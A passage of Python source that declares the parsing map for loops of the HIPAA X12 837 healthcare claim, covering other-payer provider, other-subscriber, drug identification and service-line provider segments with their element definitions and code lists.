position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Other Payer Service Facility Location Secondary Identification", position="3550", repeat="3", req_sit="R", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2330F = Loop( "2330F", Properties( desc="Other Payer Supervising Provider", looptype="", position="5650", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Other Payer Supervising Provider", position="3250", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["DQ"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Other Payer Supervising Provider Secondary Identification", position="3550", repeat="3", req_sit="R", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2330G = Loop( "2330G", Properties( desc="Other Payer Billing Provider", looptype="", position="6350", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Other Payer Billing Provider", position="3250", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["85"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1", "2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Other Payer Billing Provider Secondary Identification", position="3550", repeat="2", req_sit="R", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2320 = Loop( "2320", Properties( desc="Other Subscriber Information", looptype="", position="2900", repeat="10", req_sit="S", ), Segment( "SBR", Properties( desc="Other Subscriber Information", position="2900", repeat="1", req_sit="R", syntax="", ), Element( "SBR01", Properties( desc="Payer Responsibility Sequence Number Code", req_sit="R", data_type=("ID", "1", "1"), position=1, codes=["A", "B", "C", "D", "E", "F", "G", "H", "P", "S", "T", "U"], ), ), Element( "SBR02", Properties( desc="Individual Relationship Code", req_sit="R", data_type=("ID", "2", "2"), position=2, codes=["01", "18", "19", "20", "21", "39", "40", "53", "G8"], ), ), Element( "SBR03", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "SBR04", Properties( desc="Name", req_sit="S", data_type=("AN", "1", "60"), position=4, codes=[], ), ), Element( "SBR05", Properties( desc="Insurance Type Code", req_sit="S", data_type=("ID", "1", "3"), position=5, codes=["12", "13", "14", "15", "16", "41", "42", "43", "47"], ), ), Element( "SBR06", Properties( desc="Coordination of Benefits Code", req_sit="N", data_type=("ID", "1", "1"), position=6, codes=[], ), ), Element( "SBR07", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=7, codes=[], ), ), Element( "SBR08", Properties( desc="Employment Status Code", req_sit="N", data_type=("ID", "2", "2"), position=8, codes=[], ), ), Element( "SBR09", Properties( desc="Claim Filing Indicator Code", req_sit="S", data_type=("ID", "1", "2"), position=9, codes=[ "11", "12", "13", "14", "15", "16", "17", "AM", "BL", "CH", "CI", "DS", "FI", "HM", "LM", "MA", "MB", "MC", "OF", "TV", "VA", "WC", "ZZ", ], ), ), ), Segment( "CAS", Properties( desc="Claim Level Adjustments", position="2950", repeat="5", req_sit="S", syntax="L050607 C0605 C0705 L080910 C0908 C1008 L111213 C1211 C1311 L141516 C1514 C1614 L171819 C1817 C1917", ), Element( "CAS01", Properties( desc="Claim Adjustment Group Code", req_sit="R", data_type=("ID", "1", "2"), position=1, codes=["CO", "CR", "OA", "PI", "PR"], ), ), Element( "CAS02", Properties( desc="Claim Adjustment Reason Code", req_sit="R", data_type=("ID", "1", "5"), position=2, codes=[], ), ), Element( "CAS03", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=3, codes=[], ), ), Element( "CAS04", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=4, codes=[], ), ), Element( "CAS05", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=5, codes=[], ), ), Element( "CAS06", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=6, codes=[], ), ), Element( "CAS07", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=7, codes=[], ), ), Element( "CAS08", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=8, codes=[], ), ), Element( "CAS09", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=9, codes=[], ), ), Element( "CAS10", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=10, codes=[], ), ), Element( "CAS11", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=11, codes=[], ), ), Element( "CAS12", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=12, codes=[], ), ), Element( "CAS13", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=13, codes=[], ), ), Element( "CAS14", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=14, codes=[], ), ), Element( "CAS15", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=15, codes=[], ), ), Element( "CAS16", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=16, codes=[], ), ), Element( "CAS17", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=17, codes=[], ), ), Element( "CAS18", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=18, codes=[], ), ), Element( "CAS19", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=19, codes=[], ), ), ), Segment( "AMT", Properties( desc="Coordination of Benefits (COB) Payer Paid Amount", position="3000", repeat="1", req_sit="S", syntax="", ), Element( "AMT01", Properties( desc="Amount Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["D"], ), ), Element( "AMT02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "AMT03", Properties( desc="Credit/Debit Flag Code", req_sit="N", data_type=("ID", "1", "1"), position=3, codes=[], ), ), ), Segment( "AMT", Properties( desc="Coordination of Benefits (COB) Total Non-Covered Amount", position="3000", repeat="1", req_sit="S", syntax="", ), Element( "AMT01", Properties( desc="Amount Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["A8"], ), ), Element( "AMT02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "AMT03", Properties( desc="Credit/Debit Flag Code", req_sit="N", data_type=("ID", "1", "1"), position=3, codes=[], ), ), ), Segment( "AMT", Properties( desc="Remaining Patient Liability", position="3000", repeat="1", req_sit="S", syntax="", ), Element( "AMT01", Properties( desc="Amount Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["EAF"], ), ), Element( "AMT02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "AMT03", Properties( desc="Credit/Debit Flag Code", req_sit="N", data_type=("ID", "1", "1"), position=3, codes=[], ), ), ), Segment( "OI", Properties( desc="Other Insurance Coverage Information", position="3100", repeat="1", req_sit="R", syntax="", ), Element( "OI01", Properties( desc="Claim Filing Indicator Code", req_sit="N", data_type=("ID", "1", "2"), position=1, codes=[], ), ), Element( "OI02", Properties( desc="Claim Submission Reason Code", req_sit="N", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "OI03", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=3, codes=["N", "W", "Y"], ), ), Element( "OI04", Properties( desc="Patient Signature Source Code", req_sit="S", data_type=("ID", "1", "1"), position=4, codes=["P"], ), ), Element( "OI05", Properties( desc="Provider Agreement Code", req_sit="N", data_type=("ID", "1", "1"), position=5, codes=[], ), ), Element( "OI06", Properties( desc="Release of Information Code", req_sit="R", data_type=("ID", "1", "1"), position=6, codes=["I", "Y"], ), ), ), Segment( "MOA", Properties( desc="Outpatient Adjudication Information", position="3200", repeat="1", req_sit="S", syntax="", ), Element( "MOA01", Properties( desc="Percentage as Decimal", req_sit="S", data_type=("R", "1", "10"), position=1, codes=[], ), ), Element( "MOA02", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "MOA03", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "MOA04", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=4, codes=[], ), ), Element( "MOA05", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=5, codes=[], ), ), Element( "MOA06", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=6, codes=[], ), ), Element( "MOA07", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=7, codes=[], ), ), Element( "MOA08", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=8, codes=[], ), ), Element( "MOA09", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=9, codes=[], ), ), ), parsed_837_2330A, parsed_837_2330B, parsed_837_2330C, parsed_837_2330D, parsed_837_2330E, parsed_837_2330F, parsed_837_2330G, ) parsed_837_2410 = Loop( "2410", Properties( desc="Drug Identification", looptype="", position="4940", repeat="1", req_sit="S", ), Segment( "LIN", Properties( desc="Drug Identification", position="4930", repeat="1", req_sit="R", syntax="P0405 P0607 P0809 P1011 P1213 P1415 P1617 P1819 P2021 P2223 P2425 P2627 P2829 P3031", ), Element( "LIN01", Properties( desc="Assigned Identification", req_sit="N", data_type=("AN", "1", "20"), position=1, codes=[], ), ), Element( "LIN02", Properties( desc="Product/Service ID Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=2, codes=["EN", "EO", "HI", "N4", "ON", "UK", "UP"], ), ), Element( "LIN03", Properties( desc="Product/Service ID", req_sit="R", data_type=("AN", "1", "48"), position=3, codes=[], ), ), Element( "LIN04", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=4, codes=[], ), ), Element( "LIN05", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=5, codes=[], ), ), Element( "LIN06", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=6, codes=[], ), ), Element( "LIN07", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=7, codes=[], ), ), Element( "LIN08", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=8, codes=[], ), ), Element( "LIN09", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=9, codes=[], ), ), Element( "LIN10", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "LIN11", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=11, codes=[], ), ), Element( "LIN12", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=12, codes=[], ), ), Element( "LIN13", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=13, codes=[], ), ), Element( "LIN14", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=14, codes=[], ), ), Element( "LIN15", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=15, codes=[], ), ), Element( "LIN16", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=16, codes=[], ), ), Element( "LIN17", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=17, codes=[], ), ), Element( "LIN18", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=18, codes=[], ), ), Element( "LIN19", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=19, codes=[], ), ), Element( "LIN20", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=20, codes=[], ), ), Element( "LIN21", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=21, codes=[], ), ), Element( "LIN22", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=22, codes=[], ), ), Element( "LIN23", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=23, codes=[], ), ), Element( "LIN24", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=24, codes=[], ), ), Element( "LIN25", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=25, codes=[], ), ), Element( "LIN26", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=26, codes=[], ), ), Element( "LIN27", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=27, codes=[], ), ), Element( "LIN28", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=28, codes=[], ), ), Element( "LIN29", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=29, codes=[], ), ), Element( "LIN30", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=30, codes=[], ), ), Element( "LIN31", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=31, codes=[], ), ), ), Segment( "CTP", Properties( desc="Drug Quantity", position="4940", repeat="1", req_sit="R", syntax="P0405 C0607 C0902 C1002 C1103", ), Element( "CTP01", Properties( desc="Class of Trade Code", req_sit="N", data_type=("ID", "2", "2"), position=1, codes=[], ), ), Element( "CTP02", Properties( desc="Price Identifier Code", req_sit="N", data_type=("ID", "3", "3"), position=2, codes=[], ), ), Element( "CTP03", Properties( desc="Unit Price", req_sit="N", data_type=("R", "1", "17"), position=3, codes=[], ), ), Element( "CTP04", Properties( desc="Quantity", req_sit="R", data_type=("R", "1", "15"), position=4, codes=[], ), ), Composite( "C001", Properties( desc="Composite Unit of Measure", refdes="", repeat="", req_sit="R", seq="05", ), Element( "CTP05-01", Properties( desc="Unit or Basis for Measurement Code", req_sit="R", data_type=("ID", "2", "2"), position=0, codes=["F2", "GR", "ME", "ML", "UN"], ), ), Element( "CTP05-02", Properties( desc="Exponent", req_sit="N", data_type=("R", "1", "15"), position=1, codes=[], ), ), Element( "CTP05-03", Properties( desc="Multiplier", req_sit="N", data_type=("R", "1", "10"), position=2, codes=[], ), ), Element( "CTP05-04", Properties( desc="Unit or Basis for Measurement Code", req_sit="N", data_type=("ID", "2", "2"), position=3, codes=[], ), ), Element( "CTP05-05", Properties( desc="Exponent", req_sit="N", data_type=("R", "1", "15"), position=4, codes=[], ), ), Element( "CTP05-06", Properties( desc="Multiplier", req_sit="N", data_type=("R", "1", "10"), position=5, codes=[], ), ), Element( "CTP05-07", Properties( desc="Unit or Basis for Measurement Code", req_sit="N", data_type=("ID", "2", "2"), position=6, codes=[], ), ), Element( "CTP05-08", Properties( desc="Exponent", req_sit="N", data_type=("R", "1", "15"), position=7, codes=[], ), ), Element( "CTP05-09", Properties( desc="Multiplier", req_sit="N", data_type=("R", "1", "10"), position=8, codes=[], ), ), Element( "CTP05-10", Properties( desc="Unit or Basis for Measurement Code", req_sit="N", data_type=("ID", "2", "2"), position=9, codes=[], ), ), Element( "CTP05-11", Properties( desc="Exponent", req_sit="N", data_type=("R", "1", "15"), position=10, codes=[], ), ), Element( "CTP05-12", Properties( desc="Multiplier", req_sit="N", data_type=("R", "1", "10"), position=11, codes=[], ), ), Element( "CTP05-13", Properties( desc="Unit or Basis for Measurement Code", req_sit="N", data_type=("ID", "2", "2"), position=12, codes=[], ), ), Element( "CTP05-14", Properties( desc="Exponent", req_sit="N", data_type=("R", "1", "15"), position=13, codes=[], ), ), Element( "CTP05-15", Properties( desc="Multiplier", req_sit="N", data_type=("R", "1", "10"), position=14, codes=[], ), ), ), Element( "CTP06", Properties( desc="Price Multiplier Qualifier", req_sit="N", data_type=("ID", "3", "3"), position=6, codes=[], ), ), Element( "CTP07", Properties( desc="Multiplier", req_sit="N", data_type=("R", "1", "10"), position=7, codes=[], ), ), Element( "CTP08", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=8, codes=[], ), ), Element( "CTP09", Properties( desc="Basis of Unit Price Code", req_sit="N", data_type=("ID", "2", "2"), position=9, codes=[], ), ), Element( "CTP10", Properties( desc="Condition Value", req_sit="N", data_type=("AN", "1", "10"), position=10, codes=[], ), ), Element( "CTP11", Properties( desc="Multiple Price Quantity", req_sit="N", data_type=("N0", "1", "2"), position=11, codes=[], ), ), ), Segment( "REF", Properties( desc="Prescription or Compound Drug Association Number", position="4950", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["VY", "XZ"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2420A = Loop( "2420A", Properties( desc="Rendering Provider Name", looptype="", position="5000", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Rendering Provider Name", position="5000", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["82"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1", "2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="S", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "PRV", Properties( desc="Rendering Provider Specialty Information", position="5050", repeat="1", req_sit="S", syntax="P0203", ), Element( "PRV01", Properties( desc="Provider Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["PE"], ), ), Element( "PRV02", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["PXC"], ), ), Element( "PRV03", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "PRV04", Properties( desc="State or Province Code", req_sit="N", data_type=("ID", "2", "2"), position=4, codes=[], ), ), Composite( "C035", Properties( desc="Provider Specialty Information", refdes="", repeat="", req_sit="N", seq="05", ), ), Element( "PRV06", Properties( desc="Provider Organization Code", req_sit="N", data_type=("ID", "3", "3"), position=6, codes=[], ), ), ), Segment( "REF", Properties( desc="Rendering Provider Secondary Identification", position="5250", repeat="20", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="S", seq="04" ), Element( "REF04-01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=0, codes=["2U"], ), ), Element( "REF04-02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=1, codes=[], ), ), Element( "REF04-03", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "REF04-04", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "REF04-05", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "REF04-06", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=5, codes=[], ), ), ), ), ) parsed_837_2420B = Loop( "2420B", Properties( desc="Purchased Service Provider Name", looptype="", position="5000", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Purchased Service Provider Name", position="5000", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["QB"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1", "2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Purchased Service Provider Secondary Identification", position="5250", repeat="20", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="S", seq="04" ), Element( "REF04-01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=0, codes=["2U"], ), ), Element( "REF04-02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=1, codes=[], ), ), Element( "REF04-03", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "REF04-04", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "REF04-05", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "REF04-06", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=5, codes=[], ), ), ), ), ) parsed_837_2420C = Loop( "2420C", Properties( desc="Service Facility Location Name", looptype="", position="5000", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Service Facility Location Name", position="5000", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["77"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Service Facility Location Address", position="5140", repeat="1", req_sit="R", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), 